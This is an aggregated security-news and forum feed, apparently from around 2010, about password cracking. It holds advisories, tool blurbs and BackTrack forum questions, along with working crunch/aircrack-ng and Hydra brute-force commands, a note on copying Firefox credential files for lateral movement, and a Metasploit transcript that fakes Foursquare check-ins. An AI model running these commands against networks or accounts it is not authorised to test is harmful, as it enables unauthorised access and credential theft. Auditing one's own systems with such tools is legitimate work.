Hi, i can easily crack my WPA password which i set to a dictionary word recently.
However i now want to change the password to password123.
I have heard john the ripper can add 123 ...etc to each individual passphrase so I would like to do that.
After catching the handshake I notice that there are 4 packets called 'KEY'
Is this the 4 way handshake?
If so how to i get the 'hash' or password information from my handshake and transfer it manually to my windows machine to experiment with. Or what do i need to copy over?
Thanks
-
-
19:00
»
Packet Storm Security Tools
The Mandos system allows computers to have encrypted root file systems and at the same time be capable of remote or unattended reboots. The computers run a small client program in the initial RAM disk environment which will communicate with a server over a network. All network communication is encrypted using TLS. The clients are identified by the server using an OpenPGP key that is unique to each client. The server sends the clients an encrypted password. The encrypted password is decrypted by the clients using the same OpenPGP key, and the password is then used to unlock the root file system.
-
19:00
»
Packet Storm Security Recent Files
The Mandos system allows computers to have encrypted root file systems and at the same time be capable of remote or unattended reboots. The computers run a small client program in the initial RAM disk environment which will communicate with a server over a network. All network communication is encrypted using TLS. The clients are identified by the server using an OpenPGP key that is unique to each client. The server sends the clients an encrypted password. The encrypted password is decrypted by the clients using the same OpenPGP key, and the password is then used to unlock the root file system.
-
-
18:01
»
Packet Storm Security Tools
The Mandos system allows computers to have encrypted root file systems and at the same time be capable of remote or unattended reboots. The computers run a small client program in the initial RAM disk environment which will communicate with a server over a network. All network communication is encrypted using TLS. The clients are identified by the server using an OpenPGP key that is unique to each client. The server sends the clients an encrypted password. The encrypted password is decrypted by the clients using the same OpenPGP key, and the password is then used to unlock the root file system.
-
18:01
»
Packet Storm Security Recent Files
The Mandos system allows computers to have encrypted root file systems and at the same time be capable of remote or unattended reboots. The computers run a small client program in the initial RAM disk environment which will communicate with a server over a network. All network communication is encrypted using TLS. The clients are identified by the server using an OpenPGP key that is unique to each client. The server sends the clients an encrypted password. The encrypted password is decrypted by the clients using the same OpenPGP key, and the password is then used to unlock the root file system.
-
10:00
»
Hack a Day
[Dogbert] took a look at the security that goes into BIOS passwords on many laptops. He starts off with a little background about how the systems work. People are bound to forget their passwords, so when you enter a wrong one three times in a row you get a message similar to the one above [...]
-
-
20:01
»
Packet Storm Security Tools
The Mandos system allows computers to have encrypted root file systems and at the same time be capable of remote or unattended reboots. The computers run a small client program in the initial RAM disk environment which will communicate with a server over a network. All network communication is encrypted using TLS. The clients are identified by the server using an OpenPGP key that is unique to each client. The server sends the clients an encrypted password. The encrypted password is decrypted by the clients using the same OpenPGP key, and the password is then used to unlock the root file system.
-
-
13:07
»
Hack a Day
Recently, research students at Georgia Tech released a report outlining the dangers that GPUs pose to the current state of password security. There are a number of ways to crack a password, all with their different pros and cons, but when it comes down to it, the limiting factor in all of these methods is [...]
-
-
8:00
»
Hack a Day
Irongeek.com is hosting an online class on password exploitation. The event was a fundraiser called ShoeCon, but they are hosting the entire series for everyone to share. Not only are the videos there, but you can download the powerpoint slides as well. There is a massive amount of information here on various topics like Hashcat, [...]
-
-
11:47
»
SecuriTeam
Usage of weak random number generation in password reset functionality allows predicting the password reset token and the randomly generated password, which results in account takeover.
-
Make your website safer. Use external penetration testing service. First report ready in one hour!
-
-
12:07
»
SecuriTeam
An email injection vulnerability was discovered in MyBB allows injecting e.g. BCC mail headers into password reset emails.
-
Make your website safer. Use external penetration testing service. First report ready in one hour!
-
-
15:01
»
Packet Storm Security Tools
Netkeys generates the factory password for Netopia routers which bypasses any required admin password. Included is a now obsolete default WEP key generator. Win32 exe included with sources.
-
15:01
»
Packet Storm Security Recent Files
Netkeys generates the factory password for Netopia routers which bypasses any required admin password. Included is a now obsolete default WEP key generator. Win32 exe included with sources.
-
-
4:21
»
remote-exploit & backtrack
Hello there,
(I used the board search, before :) )
So, i have one question:
Is there a tool on backtrack that supports faster password recovery via solid state disk and rainbowtables? Because i read of special prepared rainbowtables (on h-online[dot]com), which are able to have a better performance in recovering NTLM passwords.
Thanks in advance,
tiger
-
-
11:58
»
Carnal0wnage
Nothing earth shattering, but since this is a place for my notes...
Sometimes while you are on a box and pilfering through all the documents doesn't yield anything useful for you to move laterally you can sometimes grab the Firefox saved passwords. Lots of times someone will save their password to the corporate OWA, wiki, helpdesk page, or whatever. Even if doesn't give you a *great* lead you'll at least get an idea if they are a password re-user or not.
So how to do it?
Actually its simple. Inside of the mozilla\firefox directory will be somethingrandom.default. Inside that folder you'll find:
key3.db
signons.sqlite
If there is no master password set, all you have to do is replace the files on your test VM with the two files you downloaded, open firefox, go to preferences, security, and do a view saved passwords.
I think there are some fancy Firefox plug-ins that can pull this info out and I'm sure there are some binaries you can push up that will dump this for you as well. But this is quick and easy and you're probably already downloading files (at least you probably *should* be) anyway...
-thanks to
Mubix for telling me about this.
-
-
20:01
»
Packet Storm Security Tools
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes. On top of this, many other hash types are added with contributed patches, and some are added in John the Ripper Pro.
-
20:00
»
Packet Storm Security Recent Files
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes. On top of this, many other hash types are added with contributed patches, and some are added in John the Ripper Pro.
-
-
16:58
»
remote-exploit & backtrack
I am wanting to change my clock time and I noticed I am not allowed to do so
When i want to do stuff from root at the command line it allows me I changed the default password of toor to my password after boot and I can do command line linux admin things without problem.
Everytime I try something that involves KDE root access it rejects my password.
Thanks to anyone who can help on this
-
-
17:00
»
Packet Storm Security Advisories
It is impossible to maintain a secure session with Twitter, for multiple reasons. Additionally, once a session has been hijacked, it is possible for the attacker to maintain control over the account (not just the session) indefinitely, unless the user changes their password. This is because the session cookie has the same lifetime as the password.
-
-
22:00
»
SecuriTeam
This issue may make it much easier to convince a victim to submit web application credentials to the attacker's site.
-
Make your website safer. Use external penetration testing service. First report ready in one hour!
-
-
6:01
»
remote-exploit & backtrack
i have two password tables:
mens_name.lst
Code:
Aaron
Abdiel
Abdullah
Abel
Abraham
Abram
Adam
Adan
Addison
Aden
Aditya
Adolfo
Adonis
Adrian
Adriel
Adrien
Agustin
...etc
and dob.lst (dates of birth)
Code:
25321
32521
2531921
3251921
1921/25/03
25/03/1921
03/25/1921
25/3/21
3/25/21
25/3/1921
3/25/1921
1921-25-03
25-03-1921
03-25-1921
25-3-21
3-25-21
25-3-1921
3-25-1921
1921.25.03
25.03.1921
03.25.1921
...etc
my objective is to merge the two so i have a single list looking like this:
Code:
Aaron25321
Aaron32521
Aaron2531921
Aaron3251921
Aaron1921/25/03
Aaron25/03/1921
Aaron03/25/1921
Aaron25/3/21
..etc
Abdiel25321
Abdiel32521
Abdiel2531921
Abdiel3251921
Abdiel1921/25/03
Abdiel25/03/1921
Abdiel03/25/1921
Abdiel25/3/21
..etc
Abdullah25321
Abdullah32521
Abdullah2531921
Abdullah3251921
Abdullah1921/25/03
Abdullah25/03/1921
Abdullah03/25/1921
Abdullah25/3/21
....etc
If anybody knows how to do this and would like to share the info with i'd be so grateful. I'd also quite happily share the finished product with you :)
regards imcookie
-
-
18:21
»
remote-exploit & backtrack
I have an ASUS P6T7 WS SuperComputer motherboard with 4 nvidia 9800GTx+ cards in it and I installed the aircrack-cuda program I learned about on these forums **.
I can rip through passwords using John The Ripper at about 200,000K/s but the program misses the password of a known .cap file that I have.
When I run aircrack-ng (normal) using a word list of all English words I can crack the capture easily, but when running the CUDA enabled version I get to the end of the list without ever finding the password.
Is this a Known issue or did I do something wrong?
I googled the problem but I always end up back at these forums with no answer.
I am new to forums in general so please be gentile if I did it wrong and just made an ass out of myself.
**howtos/23208-aircrack-ng-cuda-wpa-2-psk-hacking-backtrack-4beta.html][/url]
-
-
18:00
»
remote-exploit & backtrack
Hello, could somebody please tell me how I'm able to totally reset my password? My laptop conveniently saved my password but I cannot remember it so now I need to totally reset it.
Regards
AssosutsmoosE
-
-
6:56
»
Carnal0wnage
mindless foursquare fun goes metasploit style...
msf > use auxiliary/admin/foursquare
msf auxiliary(foursquare) > info
Name: Foursquare Location Poster
Version: $Revision:$
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
CG
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD password yes foursquare password
Proxies no Use a proxy chain
RHOST api.foursquare.com yes The target address
RPORT 80 yes The target port
USERNAME username yes foursquare username
VENUEID 185675 yes foursquare venueid
VHOST no HTTP server virtual host
Description:
Fuck with Foursquare, be anywhere you want to be by venue id
References:
http://groups.google.com/group/foursquare-api
http://www.mikekey.com/im-a-foursquare-cheater/
msf auxiliary(foursquare) >
msf auxiliary(foursquare) > set USERNAME notmyusername@host.com
USERNAME => notmyusername@host.com
msf auxiliary(foursquare) > set PASSWORD notmypassword
PASSWORD => notmypassword
msf auxiliary(foursquare) > set VENUEID 9186
VENUEID => 9186
msf auxiliary(foursquare) > run
[*] HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Date: Fri, 19 Mar 2010 13:59:28 GMT
Content-Length: 1311
Server: nginx/0.7.64
Connection: keep-alive
Fri, 19 Mar 10 13:59:28 +0000OK! We've got you @ Washington Monument. This is your 1st checkin here!9186Washington Monument79199Parks & Outdoors:Sculpture SNIP
[*] Auxiliary module execution completed
You can get the module here:
http://code.google.com/p/carnal0wnage/source/browse/trunk/msf3/modules/auxiliary/admin/random/foursquare.rb
-
-
17:00
»
Packet Storm Security Advisories
Secunia Research has discovered a security issue in Quicksilver Forums, which can be exploited by malicious, local users to disclose sensitive information. The application passes the database password via the command line to the mysqldump utility, which may disclose the password via the process list.
-
3:51
»
remote-exploit & backtrack
Hi,
Last week I decided to check if my network was secure "enough". I got my WPA Handshake within seconds (which is quite acceptable). I then got down to trying to crack it.
I used all the dictionaries i could get my hands on to try and brute-force my way in but found nothing. So far so good. But I still wasn't convinced.
Through some social engineering, and after a few pints of lager, i tricked myself into telling me that the password was made of a 10 digit mixture of letters and numbers. I therefore tried a different way:
/pentest/password/crunch 10 10 "abcdefghijkl.......1234567890" | aircrack-ng ..... wpa-01.cap
After something like 4 days of scanning 385 keys/second it had barely just started the 3rd digit. This made me feel a lot safer.
Question: Are there "faster" ways other than crunch to get to a 10 digit password by checking every possible permutation, or may I assume that no one is going to have the time to crack my password (at least for the next few hundreds of years) ???
Thanks
-
-
8:22
»
Packet Storm Security Recent Files
Secunia Research has discovered security issue in Employee Timeclock Software, which can be exploited by malicious, local users to disclose sensitive information. The security issue is caused due to the application passing the database password via the command line to the mysqldump utility, which potentially can be exploited to disclose the password via the process list. Version 0.99 is affected.
-
8:22
»
Packet Storm Security Advisories
Secunia Research has discovered security issue in Employee Timeclock Software, which can be exploited by malicious, local users to disclose sensitive information. The security issue is caused due to the application passing the database password via the command line to the mysqldump utility, which potentially can be exploited to disclose the password via the process list. Version 0.99 is affected.
-
-
3:35
»
remote-exploit & backtrack
Hi ,
I have a book in winrar format which is protected with password .It takes a very great deal of time when it is usually used the standard softwares for removing the password , you know . Do you know if exists another way that is faster and more reliable for removing the password ?
thank you in advanced ?
-
-
21:10
»
remote-exploit & backtrack
Hello all,
My management has approved an audit of AD accounts looking for weak passwords
Since I have the server and backups I would have access to NTDS.DIT file, is there away to extract password hashes directly from it? I'm trying to avoid running LC or fgdump on the Active Directory domain controller.
I've searched high and low and have not been able to find an answer.
-
-
22:44
»
remote-exploit & backtrack
Hello,
I see lots of videos on how to hack WEP. Actually thats basically what i see on here and on other videos sites. My question is. Whats next? After you hack the victims WEP. Then what do you do. Ok you have there password. So whats the big deal to get there password to access there internet?
I dont see any other videos for this next feture. All i see is how to hack wep. Can someone tell me whats next so i can start to do some research please.
I did see a video that someone took over there computer and i seen a video something about a social network hack ( not sure if thats correct way of saying it though ) But whats next after you hack there wep key
thanks
Big Mike
-
22:44
»
remote-exploit & backtrack
Hello,
I see lots of videos on how to hack WEP. Actually thats basically what i see on here and on other videos sites. My question is. Whats next? After you hack the victims WEP. Then what do you do. Ok you have there password. So whats the big deal to get there password to access there internet?
I dont see any other videos for this next feture. All i see is how to hack wep. Can someone tell me whats next so i can start to do some research please.
I did see a video that someone took over there computer and i seen a video something about a social network hack ( not sure if thats correct way of saying it though ) But whats next after you hack there wep key
thanks
Big Mike
-
-
14:00
»
Packet Storm Security Tools
EFIPW is a tool that can be used to decode and modify Apple EFI firmware passwords via the command line. It is designed after the non open source OFPW utility and is designed to work on Intel machines running Leopard or newer. Useful for lab deployments (setting the firmware password of machines as a post install item) and pen tests (recovering the EFI firmware password).
-
14:00
»
Packet Storm Security Recent Files
EFIPW is a tool that can be used to decode and modify Apple EFI firmware passwords via the command line. It is designed after the non open source OFPW utility and is designed to work on Intel machines running Leopard or newer. Useful for lab deployments (setting the firmware password of machines as a post install item) and pen tests (recovering the EFI firmware password).
-
-
14:29
»
remote-exploit & backtrack
salve a tutti,
ho un piccolo problema con john.ho cercato di cracckare la mia password di sistema ,ma quand do' il file etc/passwd gia shawdato a john la risposta da terminale e' :
NO PASSWORD HASHED LOADED.
come mai?
Ripeto che ho gia' effettuato lo unshadow del file password .
grazie per il vostro aiuto
-
4:29
»
remote-exploit & backtrack
Hi !
I've got a Little Question guys .
I've installed my Backtrack 4 on VM Workstation , works perfect so far !
No I wanted to crack my password, of my windows account with Chntpw .
But i've got a little problem :p.
I need to go to the 'disk' where my windows is on , like hda1 , or sda1 ,..
But like I said i've installed Backtrack on VM Workstation , and when I go into a terminal , en do Cfdisk , to see my drives (Right?) I only see the 'Virtual' drives , so not the drive Windows is on.
So my question , Is it possible to crack the windows password, with Backtrack on VM Workstation ? Or do I need to run the live CD ?
Thx!
-
-
13:54
»
remote-exploit & backtrack
Hey,
I was just wondering if anyone had an easy way of pulling from the Username column and putting it into 1 .txt file and then pulling from the password column and putting it into another .txt file? The following is the website I would like to do this from. Thanks in advance for looking.
http://www.phenoelit-us.org/dpl/dpl.htmll/dpl.html
-
-
17:18
»
remote-exploit & backtrack
For the past two weeks I have been messing with cracking wpa, wpa2 networks. I have scoured the forums here as well as googled enough that it now only suggests wpa related topics lol.
But from what I've concluded, it seems that wpa2 is quiet possibly as secure as we need as long as you have a secure password.
My rationale is that because a person can literally make anything their password that most wordlists would not be able to crack it. If someone makes there password with just their last name and say, their birthday. (i.e. Martin04221966) most password lists would not be able to crack that.
So, I guess my overall question is for someone to correct me if I'm wrong on saying that if a password includes a proper noun or multiple words plus numbers, the wpa attack would not be able to crack the password.
-
11:12
»
remote-exploit & backtrack
Try my suggestion (crunch + aircrack-ng without a dictionary)
/ pentest / passwords / crunch /. / crunch 9 9 | aircrack-ng -b (BSSID) -w - / root/.gerix-wifi-cracker/sniff_dump- *. cap
I got 100%
-
4:00
»
darkc0de
Some Body Can Help Me Decrypt This Password
-
-
16:01
»
remote-exploit & backtrack
Hi everyone,
I've trying to increase my knowledge of network penetration to keep my network secure and so far these are the things I have done:
WEP hack, WPA hack then crack with GPU acceleration, ARP poisoning to sniff out passwords, Passive URL sniffing
However I'm interested to see what I can do further with my network, e.g:
1. Brute force my router password
2. Gain access to files on my computer network: password protected shared file (I've got WinXP, Win7, OSX, Ubuntu server connected)? Would this involve a way of obtaining an LM hash and then bruteforcing it? Something like ophcrack
3. Backdoors to gain access to all my files (not just the password protected shared ones)
4. Hack my homegroup.
I would really appreciate some keywords that I can use to search these forums and google.
-
5:36
»
remote-exploit & backtrack
Ciao amici
vi faccio vedere un semplice attacco verso un router usando Hydra , questo avviene tramite console non GUI.
* apri la console e scrivi:
# hydra -l "admin" - P wordlist.txt -vV -s 80 -f 192.168.1.1 http-get /
Spiegazione:
la ( -l ) rappresenta (admin) la grande parte dei router hanno Admin come username, per essere sicuri google la marca del tuo router.
la ( -P ) e' per il password list ( se la tua password list ha un nome diverso, cambia Wordlist.txt con la tua)
la ( -vV ) fa' vedere il login e password ad ogni prova. in piu
usa un modo insistente .
la ( -s ) rappresenta la porta da attaccare, i routers comunicono tramite porta 80.
la ( -f ) serve a Hydra di finire il lavoro appena ha trovato la combinazione.
la ( / ) finale non sono sicuro ma durante i test che ho fatto dovevo metterla per forza.
*** Se la password si trova nel tuo passlist, Hydra all fine ti dara' la combinazione : User + Password.
Buon Divertimento
GD
1337day (was: Inj3ct0r, 1337db)
OSVDB Vulnerabilities
Exploit-DB
SecurityFocus Vulnerabilities
Bugtraq
XSSed
Penetration Testing
BackTrack Linux Forums
Threatpost
SecDocs
carnal0wnage.attackresearch.com
Darknet
The Exploitant
Wirevolution
